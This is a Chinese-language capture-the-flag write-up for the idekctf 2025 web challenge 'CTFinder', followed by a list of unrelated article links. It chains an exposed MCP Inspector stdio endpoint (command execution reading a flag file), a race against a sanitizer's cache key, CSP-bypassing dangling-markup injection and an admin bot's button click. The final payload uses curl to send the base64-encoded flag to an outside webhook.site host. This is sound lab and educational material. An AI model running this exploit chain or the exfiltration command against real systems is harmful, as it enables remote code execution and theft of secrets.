当前位置: 首页 > news >正文

悬空标记攻击 -- idekctf 2025 CTFinder

题目信息

web/CTFinder

I made a chat service where you can have CTF related conversations using ctftime MCP!

Oh but it’s still in beta so I haven’t actually applied MCP to the service yet and am just testing… there shouldn’t be any problems right?

  • MCP server may take some time to start up (3-5 seconds)
  • Challenge can be solved without Claude API key
  • Use “localhost” instead of container names in the instance server

part 1

首先flag在mpc server里,先研究怎么从这个容器取flag

发现开了个调试页面

mcp-server-1  | Spawned stdio transport
mcp-server-1  | Connected MCP client to backing server transport
mcp-server-1  | Created web app transport
mcp-server-1  | Set up MCP proxy
mcp-server-1  | 🔍 MCP Inspector is up and running at http://127.0.0.1:6274 🚀

Transport Type 选择 STDIO 的时观察到前端发送的参数被当作命令执行了

mcp-server-1  | New connection
mcp-server-1  | Query parameters: [Object: null prototype] {
mcp-server-1  |   command: 'python',
mcp-server-1  |   args: '-c "import json,sys;print(json.dumps({\\"result\\":sys.stdin.read()}))"',
mcp-server-1  |   env: '{"HOME":"/home/mcpuser","PATH":"/tmp/.npm-cache/_npx/1d40d075a5198d81/node_modules/.bin:/app/node_modules/.bin:/node_modules/.bin:/usr/lib/node_modules/npm/node_modules/@npmcli/run-script/lib/node-gyp-bin:/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"}',
mcp-server-1  |   transportType: 'stdio'
mcp-server-1  | }
mcp-server-1  | Stdio transport: command=/usr/local/bin/python, args=-c,import json,sys;print(json.dumps({"result":sys.stdin.read()}))
mcp-server-1  | Spawned stdio transport
mcp-server-1  | Connected MCP client to backing server transport
mcp-server-1  | Created web app transport

接下来我们只需要让其结果作为错误抛出即可

GET /stdio?command=/bin/sh&args=-c 'echo "FLAG:$(cat /app/flag.txt)" 1>&2; exit 1'&env={"HOME":"/home/mcpuser","PATH":"/tmp/.npm-cache/_npx/1d40d075a5198d81/node_modules/.bin:/app/node_modules/.bin:/node_modules/.bin:/usr/lib/node_modules/npm/node_modules/@npmcli/run-script/lib/node-gyp-bin:/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"}&transportType=stdio HTTP/1.1
Host: 192.168.6.133:6277
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: */*
Origin: http://192.168.6.133:6274
Referer: http://192.168.6.133:6274/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: mcp-session-id
Content-Type: text/event-stream
Cache-Control: no-cache, no-transform
Connection: keep-alive
Date: Sat, 09 Aug 2025 14:13:25 GMT
Content-Length: 197event: endpoint
data: /message?sessionId=0f04405f-64c0-4fba-9272-d9076e029218event: message
data: {"jsonrpc":"2.0","method":"notifications/stderr","params":{"content":"FLAG:idek{fake-flag}\n"}}

远程靶机并不开放此端口,看来下一步我们需要想办法访问此端口

part 2

接下来我们该找到触发bot的方法

// 引入所需模块
const puppeteer = require("puppeteer-core");
const express = require("express");
const dotenv = require("dotenv");
const crypto = require("crypto");// 加载环境变量
dotenv.config();const app = express();// 从环境变量中获取管理员用户名、密码和报告密钥
const ADMIN_USERNAME = process.env.ADMIN_USERNAME;
const ADMIN_PASSWORD = process.env.ADMIN_PASSWORD;
const REPORT_KEY = process.env.REPORT_KEY;/*** 让 bot 访问指定 URL 并执行相关操作* @param {string} url - 需要访问的 URL* @param {string} report_id - 报告 ID*/
const visit = async (url, report_id) => {let browser;try {// 启动 Puppeteer 浏览器browser = await puppeteer.launch({headless: "new",executablePath: "/usr/bin/google-chrome",args: ["--no-sandbox","--disable-dev-shm-usage","--disable-gpu","--incognito","--js-flags=--noexpose_wasm,--jitless","--disable-web-security",],});// 新建页面let page = await browser.newPage();// 访问登录页面await page.goto(`http://main:1337/auth/login`, {timeout: 5000,waitUntil: "domcontentloaded",});// 填写用户名和密码并点击登录按钮await page.evaluate((ADMIN_USERNAME, ADMIN_PASSWORD) => {document.querySelector("#username").value = ADMIN_USERNAME;document.querySelector("#password").value = ADMIN_PASSWORD;document.querySelector("#loginBtn").click();},ADMIN_USERNAME,ADMIN_PASSWORD);// 等待页面跳转await page.waitForNavigation({timeout: 5000,waitUntil: "domcontentloaded"});// 访问目标 URLawait page.goto(url, {timeout: 5000,waitUntil: "domcontentloaded",});// 移除 meta refresh,防止自动跳转await page.evaluate(() => {document.querySelectorAll('meta[http-equiv]').forEach(el => {if (el.getAttribute('http-equiv').toLowerCase() === 'refresh') {el.remove();}});window.stop();});// 等待 2 秒await page.waitForTimeout(2000);// 点击报告检查按钮await page.evaluate((report_id) => {const btn = document.querySelector(`#checkReportBtn-${report_id}`);if (btn) btn.click();}, report_id);// 再等待 2 秒await page.waitForTimeout(2000);// 注销登录await page.goto(`http://main:1337/auth/logout`, {timeout: 5000,waitUntil: "domcontentloaded",});// 再等待 2 秒await page.waitForTimeout(2000);// 关闭页面和浏览器await page.close();await browser.close();browser = null;} catch (err) {console.log("bot 错误", err);} finally {if (browser) await browser.close();}
};/*** 处理 GET / 请求,参数为 session_id 和 user_id*/
app.get("/", async (req, res) => {const session_id = req.query.session_id;const user_id = req.query.user_id;// 检查参数if (!session_id || !user_id) {return res.status(400).json({ error: "必须提供 session_id 和 user_id" });}// 生成 report_idconst report_id = crypto.createHash("sha256").update(`${session_id}:${user_id}:${REPORT_KEY}`).digest("hex").slice(0, 7);// 构造目标 URLconst url = `http://main:1337/sessions/${session_id}?user_id=${user_id}&report_id=${report_id}`;// 让 bot 访问await visit(url, report_id);res.json({ message: "Bot 已访问指定 URL" });
});// 启动服务
app.listen(5010, () => {console.log("Bot 正在 5010 端口运行");
});

bot运行在5010,接下来寻找调用此端口服务的地方

# 获取会话报告,并通知bot访问
@session_bp.route('/<session_id>/report', methods=['GET'])
@login_required
@token_required
def get_report(session_id):user_id = flask_session['user_id']redis = get_redis()report = redis.get(f"session:{session_id}:{user_id}:report")if not report:return jsonify({'error': 'No report found'}), 404# 通知bot访问res = requests.get(f"http://bot:5010/?session_id={session_id}&user_id={user_id}")if res.json().get('message') != "Bot visited the URL":return jsonify({'error': 'Failed to get report'}), 400# 删除报告缓存redis.delete(f"session:{session_id}:{user_id}:report")return jsonify({'message': 'Report sent'}), 200

接下来寻找什么地方储存了 ...report

def stream_claude_response(app, session_id, user_id, content, parent_message_id, stream_channel):with app.app_context():# 获取会话历史conversation_history = get_conversation_history(session_id, user_id)# 获取用户的API密钥api_key = get_token_by_user_id(user_id)# 构造请求头headers = {"x-api-key": api_key,"anthropic-version": "2023-06-01","content-type": "application/json"}# 构造请求体request_body = {"model": "claude-3-5-haiku-latest","max_tokens": 4000,"messages": conversation_history + [{"role": "user", "content": content}],"stream": True}redis = get_redis()# 生成助手消息IDassistant_message_id = str(uuid.uuid4())# 向Anthropic Claude API发起POST请求,开启流式响应response = requests.post("https://api.anthropic.com/v1/messages",headers=headers,json=request_body,stream=True)# 如果响应不正常,处理错误if not response.ok:error_message = f"Claude API Error: HTTP {response.status_code}"try:error_data = response.json()# 如果有详细错误信息,拼接到错误消息中if 'error' in error_data:error_message += f" - {error_data['error']['message']}"except:pass# 向前端推送错误事件redis.publish(stream_channel, json.dumps({"event": "error","message": "Error streaming response","status_code": 500}))# 设置会话报告,供后续bot访问redis.set(f"session:{session_id}:{user_id}:report", json.dumps({"event": "error","meta": json.loads(redis.get(stream_channel.replace('stream', 'meta'))),"message_id": assistant_message_id,"message": error_message}))# 清理meta和stream通道redis.delete(stream_channel.replace('stream', 'meta'))redis.delete(stream_channel)return# 用于存储完整回复内容full_content = ""# 记录token数量token_count = 0# 向前端推送开始事件redis.publish(stream_channel, json.dumps({"event": "start","message_id": assistant_message_id,"parent_id": parent_message_id}))# 逐行读取Claude的流式响应for line in response.iter_lines():if line:line_text = line.decode('utf-8')# 只处理以"data: "开头的行if line_text.startswith('data: '):line_data = json.loads(line_text[6:])# 只处理内容块增量if 'type' in line_data and line_data['type'] == 'content_block_delta':content_delta = line_data['delta']['text']# 对内容进行HTML转义content_delta = html.escape(content_delta)# 拼接到完整内容full_content += content_deltatoken_count += 1# 推送内容块到前端redis.publish(stream_channel, json.dumps({"event": "chunk","message_id": assistant_message_id,"content": content_delta}))# 推送完整内容到前端redis.publish(stream_channel, json.dumps({"event": "complete","message_id": assistant_message_id,"content": full_content}))# 对完整内容进行安全检查和清洗sanitizer = Sanitizer(full_content)if sanitizer.check(session_id, user_id):full_content = sanitizer.sanitize()# 获取meta数据meta_data = json.loads(redis.get(stream_channel.replace('stream', 'meta')))# 保存用户消息到数据库save_message_to_db(session_id, user_id, parent_message_id, 'user', meta_data['content'], None, 0)# 保存助手消息到数据库save_message_to_db(session_id, user_id, assistant_message_id, 'assistant', full_content, parent_message_id, token_count)# 清理meta和stream通道redis.delete(stream_channel.replace('stream', 'meta'))redis.delete(stream_channel)

寻找什么地方调用了get_report

@session_bp.route('/<session_id>/messages', methods=['POST'])
@login_required
@token_required
def create_message(session_id):user_id = flask_session['user_id']data = request.get_json()if not data or not data.get('content'):return jsonify({'error': 'content is required'}), 400redis = get_redis()# 如果报告未完成,不能发消息if redis.get(f"session:{session_id}:{user_id}:report"):return jsonify({'error': 'Report is not finished yet'}), 400content = data.get('content')# 内容安全检查sanitizer = Sanitizer(content)if sanitizer.check(session_id, user_id):content = sanitizer.sanitize()timestamp = int(time.time())message_id = str(uuid.uuid4())meta_cache_key = f'session:{session_id}:{user_id}:{timestamp}:meta'stream_channel = f'session:{session_id}:{user_id}:{timestamp}:stream'db = get_db()cursor = db.execute('SELECT id FROM messages WHERE session_id = ?',(session_id,)).fetchone()# 如果是新会话,自动用首条消息内容作为标题if not cursor:db.execute('UPDATE sessions SET title = ? WHERE id = ?',(content[:20], session_id))db.commit()redis = get_redis()redis.set(meta_cache_key, json.dumps({'message_id': message_id,'role': 'user','content': content,'token_count': 0,'parent_id': None,'timestamp': timestamp}), ex = 60 * 5)# 启动后台线程处理Claude回复thread = threading.Thread(target=stream_claude_response,args=(current_app._get_current_object(), session_id, user_id, content, message_id, stream_channel))thread.daemon = Truethread.start()return jsonify({'message_id': message_id,'status': 'processing','stream_channel': stream_channel,'content': content}), 202

part 3

接下来 http://main:1337/sessions/${session_id}?user_id=${user_id}&report_id=${report_id} 的页面如何造成xss?

# 创建消息(用户发言)
@session_bp.route('/<session_id>/messages', methods=['POST'])
@login_required
@token_required
def create_message(session_id):user_id = flask_session['user_id']data = request.get_json()if not data or not data.get('content'):return jsonify({'error': 'content is required'}), 400redis = get_redis()# 如果报告未完成,不能发消息if redis.get(f"session:{session_id}:{user_id}:report"):return jsonify({'error': 'Report is not finished yet'}), 400content = data.get('content')# 内容安全检查sanitizer = Sanitizer(content)if sanitizer.check(session_id, user_id):content = sanitizer.sanitize()timestamp = int(time.time())message_id = str(uuid.uuid4())meta_cache_key = f'session:{session_id}:{user_id}:{timestamp}:meta'stream_channel = f'session:{session_id}:{user_id}:{timestamp}:stream'db = get_db()cursor = db.execute('SELECT id FROM messages WHERE session_id = ?',(session_id,)).fetchone()# 如果是新会话,自动用首条消息内容作为标题if not cursor:db.execute('UPDATE sessions SET title = ? WHERE id = ?',(content[:20], session_id))db.commit()redis = get_redis()redis.set(meta_cache_key, json.dumps({'message_id': message_id,'role': 'user','content': content,'token_count': 0,'parent_id': None,'timestamp': timestamp}), ex = 60 * 5)# 启动后台线程处理Claude回复thread = threading.Thread(target=stream_claude_response,args=(current_app._get_current_object(), session_id, user_id, content, message_id, stream_channel))thread.daemon = Truethread.start()return jsonify({'message_id': message_id,'status': 'processing','stream_channel': stream_channel,'content': content}), 202

我们在此处遇到了第一处waf

import time
import bleach
import hashlib# 用于缓存内容安全检查结果,避免重复计算
sanitize_store = {}class Sanitizer:def __init__(self, content: str):# 初始化,保存待检查的内容self.content = contentdef generate_key(self, session_id, user_id):"""生成唯一的哈希key,用于缓存本次内容的检查结果:param session_id: 会话ID:param user_id: 用户ID:return: 哈希字符串"""global sanitize_store# 取内容前128字符作为noncenonce = self.content[:128]# 当前时间戳timestamp = int(time.time())# 拼接keykey = f"{session_id}:{user_id}:{nonce}:{timestamp}"# 生成sha256哈希hash = hashlib.sha256(key.encode()).hexdigest()return hashdef check(self, session_id, user_id):"""检查内容中是否包含不安全字符:param session_id: 会话ID:param user_id: 用户ID:return: True表示需要清洗,False表示安全"""global sanitize_storehash = self.generate_key(session_id, user_id)# 如果已经检查过,直接返回缓存结果if hash in sanitize_store:return sanitize_store[hash]# 定义不安全字符列表bad_chars = ['<', '>', '=', '!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '[', ']', '{', '}', '|', '\\', '/', '?', ':', ';', '.', ',', '\'', '\"', '`', '~']# 检查内容中是否包含不安全字符for char in bad_chars:if char in self.content:sanitize_store[hash] = Truereturn True# 没有发现不安全字符,缓存并返回Falsesanitize_store[hash] = Falsereturn Falsedef sanitize(self):"""对内容进行清洗,只允许部分HTML标签和属性:return: 清洗后的内容"""# 允许的HTML标签allowed_tags = ['p', 'strong', 'ul', 'ol', 'li', 'h1', 'h2', 'h3', 'h4', 'code']# 允许的HTML属性allowed_attrs = {'*': ['class']}# 使用bleach进行内容清洗return bleach.clean(self.content, tags=allowed_tags, attributes=allowed_attrs)

generate_key 只取前128位,且其时间单位最小是秒,这给了我们利用条件竞争的机会,让两个有效负载命中同一个缓存键来绕过waf

a = Thread(target=send_message, args=(sess, sid, 'A' * 128))
b = Thread(target=send_message, args=(sess, sid, 'A' * 128 + payload))

part 4

这仍不能被执行,其还有严格的CSP

    csp_policy = ("default-src 'self'; "f"script-src 'self' 'nonce-{nonce}' https://cdn.tailwindcss.com; ""style-src 'self' 'unsafe-inline' https://cdn.tailwindcss.com https://cdnjs.cloudflare.com; ""font-src 'self' https://cdnjs.cloudflare.com; ""img-src 'self'; ""connect-src 'self'; ""media-src 'self'; ""worker-src 'self'; ""child-src 'none'; ""frame-src 'none'; ""object-src 'none'; ""base-uri 'self'; ""form-action 'self'; ""frame-ancestors 'none'; ")

但是如果我们注入具有相同元素 ID 的链接,机器人会点击我们的链接,重定向到我们想要的任何地方。

    await page.evaluate((report_id) => {const btn = document.querySelector(`#checkReportBtn-${report_id}`);if (btn) btn.click();}, report_id);

part 5

审计html发现特殊功能

// 异步函数:保存报告日志
async function saveReportLog() {// 获取消息容器中所有用户消息和消息对元素const allMessages = messagesContainer.querySelectorAll('.message.user, .message-pair');let userMessage = null;// 从最新消息开始倒序查找用户消息for (let i = allMessages.length - 1; i >= 0; i--) {const messageElement = allMessages[i];// 如果是独立的用户消息if (messageElement.classList.contains('user')) {const proseContent = messageElement.querySelector('.prose');if (proseContent) {// 获取消息内容并去除首尾空格userMessage = proseContent.innerHTML.trim();break;}}// 如果是消息对(用户+AI的对话对)if (messageElement.classList.contains('message-pair')) {const userDiv = messageElement.querySelector('.justify-end .prose');if (userDiv) {// 获取用户消息内容并去除首尾空格userMessage = userDiv.innerHTML.trim();break;}}}// 如果没有找到用户消息,输出警告并返回if (!userMessage) {console.warn('未找到要保存报告日志的用户消息');return;}// 对消息内容进行安全处理:// 1. 移除换行符和制表符// 2. 转义HTML特殊字符userMessage = userMessage.replace(/\n/g, '').replace(/\r/g, '').replace(/\t/g, '').replace(/</g, '&lt;').replace(/>/g, '&gt;');try {// 发送POST请求到服务器保存报告日志const response = await fetch(`/admin/sessions/${currentSessionId}/report`, {method: 'POST',headers: {'Content-Type': 'application/json'},credentials: 'same-origin',body: JSON.stringify({report_message: userMessage,  // 处理后的用户消息reporter_id: INITIAL_USER_DATA.user_id  // 报告人ID})});// 根据响应状态输出日志if (response.ok) {console.log('报告日志保存成功');} else {console.warn('报告日志保存失败:', response.status);}} catch (error) {// 捕获并输出网络错误console.error('管理员检查错误:', error);}
}

跟进admin发现鉴权失误,任何人都可以查看日志

# 获取某个会话的举报日志,GET方法
@admin_bp.route('/sessions/<session_id>/report', methods=['GET'])
@login_required
def get_report_log(session_id):user_id = flask_session['user_id']  # 当前用户IDis_admin = flask_session['is_admin']  # 当前用户是否为管理员db = get_db()  # 获取数据库连接# 查询该会话下的所有举报日志report_logs = db.execute('SELECT * FROM report_logs WHERE session_id = ?', (session_id,)).fetchall()if not report_logs:# 如果没有举报日志,返回404return jsonify({'error': 'No report logs found'}), 404report_logs_json = []for report_log in report_logs:# 只有自己或管理员可以查看if report_log['user_id'] == user_id or is_admin:report_logs_json.append({'id': report_log['id'],'user_id': report_log['user_id'],'session_id': report_log['session_id'],'message_id': report_log['message_id'],# 管理员可以看到举报内容,普通用户不能看到'report_message': report_log['report_message'] if is_admin else "Cannot view report message"})return jsonify({'report_logs': report_logs_json}), 200

接下来我们需要利用悬挂标记注入(Dangling Markup Injection) 让更多的内容被认为是message user,包括那个按钮的属性!

<div class="message user"><div class="prose"><style>
<div class="prose prose-sm max-w-none text-white"><div class="message user"><div class="prose"><style></div></div></div></div></div><div class="flex justify-start"><div class="flex max-w-[80%] flex-row items-start space-x-3"><div class="w-8 h-8 rounded-full flex items-center justify-center bg-claude-orange mr-3"><i class="fas fa-robot text-white text-sm"></i></div><div class="flex-1"><div class="bg-white border border-gray-200 rounded-2xl rounded-tl-md px-4 py-3"><div class="prose prose-sm max-w-none text-gray-800"><div class="text-red-500"><p><strong>An error occurred.</strong><br>Claude API Error: HTTP 403 - Request not allowed</p><br><button id="checkReportBtn-481239b" class="bg-red-500 text-white px-4 py-2 rounded-md">Check Report 481239b</button><br><br><p class="text-sm"><strong>'You cannot send new messages until you report.'</strong></p></div></div></div></div></div></div></style></div></div></div>

访问这里即可获取id http://192.168.6.133:1337/admin/sessions/id/report

最后我们让其重定向执行任意命令带出

<a id="checkReportBtn-{id}" href="http://mcp-server:6277/sse?transportType=stdio&command=sh&args=-c%20%22curl%20https%3A//webhook.site/2c7d64f3-cd0a-42a5-8b32-b95e3f6b19aa%3Ff%3D%60cat%20/app/flag.txt%20%7C%20base64%20-w%200%60%22" />
http://www.lryc.cn/news/618461.html

相关文章:

  • [激光原理与应用-255]:理论 - 几何光学 - CCD成像过程
  • 2025牛客暑期多校训练营3(FDJAEHB)
  • 3.8 vue2 devServer配置和 CDN 加载外部资源
  • JavaScript 实现模块懒加载的几种方式
  • Flink Redis维表:Broadcast Join与Lookup Join对比及SQL示例
  • nvm install 14.21.3 时npm 无法下载和识别
  • code-inspector-plugin插件
  • npm、pnpm、yarn区别
  • 【Linux系统】详解Ext2,文件系统
  • RabbitMQ-知识技能图谱(总结篇)
  • 智能家居Agent:物联网设备的统一控制与管理
  • 算法打卡力扣第88题:合并两个有序数组(easy)
  • 第五章 树与二叉树
  • 虚拟机高级玩法-网页也能运行虚拟机——WebAssembly
  • Day24|学习前端CSS
  • AI入门学习--AI模型评测
  • Java集合学习之forEach()遍历方法的底层原理
  • 深度解读 WizTelemetry 2.0:链路追踪如何让分布式系统“无所遁形”
  • 【2025最新版】Java基础知识学习路线图:从入门到精通的系统化指南
  • 深度贴:前端网络基础及进阶(2)
  • 【网络运维】Linux和自动化: Ansible基础实践
  • 【接口自动化】-11-接口加密签名 全局设置封装
  • 回归预测 | Matlab实现CNN-BiLSTM-self-Attention多变量回归预测
  • 如何使用gpt进行模型微调?
  • iceberg FlinkSQL 特性
  • 古风修仙主题登录页面设计与实现 附源码 ~~~
  • Iptables 详细使用指南
  • 【CSS3】录音中。。。
  • 飞算JavaAI 2.0.0深度测评:自然语言编程如何重塑Java开发范式
  • 基于 gRPC 的接口设计、性能优化与生产实践